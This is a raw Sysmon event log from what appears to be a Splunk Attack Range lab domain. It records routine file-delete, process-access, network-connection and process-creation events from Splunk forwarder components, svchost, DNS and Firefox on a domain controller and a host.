07:52:42.783{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001048960Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:52:42.733{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=021C7737D72AF8DDFE3FC55D5ED3A75F,SHA256=07FC24923DA87777068042C829709EB195663CE9F50DDA1AB17D8938517FA27B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807660Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:42.521{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00AF6F70CBADF11A2F1CF0D812BAD410,SHA256=8971D09B45FBCFEC68C63065738BF7E06D9D3697334BFC86F0ABF2867DC0E862,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048994Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:43.984{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3B68AA1E2EF1D1A8C16B475DA0E70F10,SHA256=67F9013B489E7AD95305042ECC1D3C8A8BFFF02A94047AE0CFA675383DBB0051,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048993Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:43.984{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE6ABD22F922FA861C1FF3AD72BCC980,SHA256=A80CCF13009A56991CEA363F25AC5428062BF10DDBA844826E20AAD87D32937F,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001048992Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:43.984{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=73179C9BA02E8C58340C323FE61FA6AD,SHA256=A3028DB1E19215F04DD254A2FEF19B2D30DB79B5135FEAE673CAB3FB88D7C471,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807661Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:43.537{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F775D26CF09B6FB23EA45FF42683C5B,SHA256=08299AE5AE81F567695BFC9A96707B605201676A1E19EFD481C80E6263D3B3F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048991Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:43.200{466BC892-F4CA-60EB-377D-00000000CF01}6724ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\pingsender.exeC:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Pending Pings\0460A459-2B40-4601-917A-1BE137E24F51MD5=83D2A6A331CBC744B9A0D3216580C274,SHA256=620F0B1E8D5814531794AA825684127AE85A015E87E2561C84D5A4A423B1E4C4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048990Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:52:42.985{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000807662Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:44.552{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=832AAD459E7504B9E5D7DD1AA85DA39C,SHA256=6E6DEC193952E9EE773BA1FC6E3E0DD9DED8A9C90CDA2F10E928306917E4B0EE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048997Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:36.548{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local64910- 354300x80000000000000001048996Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:36.434{00000000-0000-0000-0000-000000000000}7520<unknown 
process>-tcptruefalse10.0.1.14win-dc-890.attackrange.local51028-false13.224.193.70server-13-224-193-70.fra2.r.cloudfront.net443https 354300x80000000000000001048995Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:36.417{466BC892-02BC-60E8-2D00-00000000CF01}1840C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-890.attackrange.local62465- 23542300x8000000000000000807664Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:45.568{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3C1A436F4E4164BB3F0A955CAC2BA83,SHA256=0A6E15BE7D206F96855CD767B6AC327993141D032E92282A9965ECE45B34A14F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807663Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:44.232{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57270-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001048999Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:36.553{00000000-0000-0000-0000-000000000000}6724<unknown process>-tcptruefalse10.0.1.14win-dc-890.attackrange.local51029-false35.244.247.133133.247.244.35.bc.googleusercontent.com443https 23542300x80000000000000001048998Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:44.999{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A5963F79461FEA0C54323EF73ABB8FD,SHA256=D22288B450C4F74AE6146C7259BF774FEB767E29046D9C74FF54926882EE8F1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807665Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:46.724{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE4764CA9FBE864E6F5587CF2495A869,SHA256=BC55EBB048E3AED22460AF58FEBF9424E95F7B1902D16DEC652D58C634373499,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049001Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:37.777{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51030-false10.0.1.12-8000- 23542300x80000000000000001049000Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:46.013{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8130AF741DD6B278F0475F3FDB8169AA,SHA256=0E5B46A69F93AC598D605D2BF79E471E923019C27FDF73F3264C5DC5631DABC8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807666Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:47.725{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B8E093A88D57E4C3D9F17047E870498,SHA256=8CD537494F7134DFDECE2C6216B3CD7FC1A822A808A22F30C37D3B3A46A665EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049002Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:47.065{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9B37AC3E68A94E74E5A466B1FEBE4A9,SHA256=3FA97326AB9B00280CF063DA50D55F8660C9995008083985C3C9F9F4EDE6CD0A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807667Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:48.739{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C77712A917564C83EA64223FA63B5573,SHA256=EC45D23403EF594AC7C949931359CBB424E4E346FDA0E0721333219194EE2034,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049003Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:48.080{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CCB55D8A1FF19464C8F4768A20B0BD14,SHA256=2D191938DFC59833B7F376CDE00B4963903667E511AF76112636D9BD984896AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807668Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:49.741{0C1E0330-0518-60E8-D300-00000000D001}380NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F753C41268DD0F65D153A66AF10E7F49,SHA256=D86EBEF5D9E47B29D9C91371D7A0993C9CD57E479221B9E5DD0892B8E30AC4A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049004Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:49.095{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0E857D855561CE23BEF5F6923299596,SHA256=4CE74EB55024D5921BF672B2E0167A16952C1EAFB0E27B47D1804FDF1BFD4315,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807669Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:52:50.741{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1071A49255F27A9C38EB03F3A0804E0A,SHA256=E843CEE76E0BEBA97A879CB8DFBCA711C11D4729D625588BF9BF29ABCD191CE7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049022Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:50.920{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F4D2-60EB-3A7D-00000000CF01}9800C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001049021Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:50.920{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F4D2-60EB-3A7D-00000000CF01}9800C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001049020Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:50.920{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F4D2-60EB-3A7D-00000000CF01}9800C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049019Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:52:50.920{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049018Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:50.920{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049017Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:52:50.920{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049016Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:50.920{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001049015Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:50.905{466BC892-F4D2-60EB-3A7D-00000000CF01}9800C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network 
monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001049014Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:50.440{466BC892-F4D2-60EB-397D-00000000CF01}97568676C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049013Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:50.240{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F4D2-60EB-397D-00000000CF01}9756C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049012Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:52:50.240{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049011Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:52:50.240{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049010Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:52:50.240{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049009Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 